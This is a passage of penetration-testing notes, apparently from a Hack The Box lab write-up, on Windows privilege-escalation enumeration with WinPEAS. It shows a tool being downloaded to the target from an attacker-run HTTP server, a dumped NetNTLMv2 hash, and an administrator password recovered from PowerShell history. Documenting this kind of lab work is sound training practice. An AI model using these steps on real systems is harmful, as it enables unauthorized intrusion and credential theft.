WINPEAS

root@htb:~$ BROWSER > https://github.com/carlospolop/PEASS-ng/releases/download/refs%2Fpull%2F260%2Fmerge/winPEASx64.exe
 
 * place the raw executable in ~/Downloads
 
root@htb:~$ sudo python3 -m http.server 8080
 
C:\target> powershell -c Invoke-WebRequest http://10.10.14.215:8080/winPEASx64.exe -outfile C:\Users\sql_svc\Downloads\winPEASx64.exe
 powershell -c Invoke-WebRequest http://10.10.14.215:8080/winPEASx64.exe -outfile C:\Users\sql_svc\Downloads\winPEASx64.exe

C:\Users\sql_svc\Downloads>dir
 dir
  Volume in drive C has no label.
  Volume Serial Number is 9565-0B4F

  Directory of C:\Users\sql_svc\Downloads

  03/08/2025  08:54 AM    <DIR>          .
  03/08/2025  08:54 AM    <DIR>          ..
  03/08/2025  07:12 AM            45,272 nc64.exe
  03/08/2025  08:54 AM         1,930,752 winPEASx64.exe
               2 File(s)      1,976,024 bytes
               2 Dir(s)  10,714,357,760 bytes free


C:\target> powershell -c C:\Users\sql_svc\Downloads\winPEASx64.exe
 ���������� Enumerating Security Packages Credentials
  Version: NetNTLMv2
  Hash:    sql_svc::ARCHETYPE:1122334455667788:cc329849205c1f61e52fdc19e00aaccc:01010000000000002b788e114b90db014f2d23496717becc000000000800300030000000000000000000000000300000f11c34cbf3b69a899ead4a6e45502bc55e34a586839efe4a44845307169f1c090a00100000000000000000000000000000000000090000000000000000000000

 ...
 ���������� PowerShell Settings
    PowerShell v2 Version: 2.0
    PowerShell v5 Version: 5.1.17763.1
    PowerShell Core Version: 
    Transcription Settings: 
    Module Logging Settings: 
    Scriptblock Logging Settings: 
    PS history file: C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
    PS history size: 79B
 ...
 ���������� Current Token privileges
 � Check if you can escalate privilege using some enabled token https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#token-manipulation
    SeAssignPrimaryTokenPrivilege: DISABLED
    SeIncreaseQuotaPrivilege: DISABLED
    SeChangeNotifyPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
    SeImpersonatePrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
    SeCreateGlobalPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
    SeIncreaseWorkingSetPrivilege: DISABLED
 ...
 ���������� Analyzing Windows Files Files (limit 70)
    C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
    C:\Users\Default\NTUSER.DAT
    C:\Users\sql_svc\NTUSER.DAT
 ...
 
 * can target SeImpersonatePrivilege
 
C:\target> dir C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\
 dir
  Volume in drive C has no label.
  Volume Serial Number is 9565-0B4F

  Directory of C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine

 01/20/2020  05:04 AM    <DIR>          .
 01/20/2020  05:04 AM    <DIR>          ..
 03/17/2020  01:36 AM                79 ConsoleHost_history.txt
               1 File(s)             79 bytes
               2 Dir(s)  10,713,939,968 bytes free
 
C:\target> type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
 net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
 exit
PreviousMS SQL NextPERSISTENCE
Last updated 1 month ago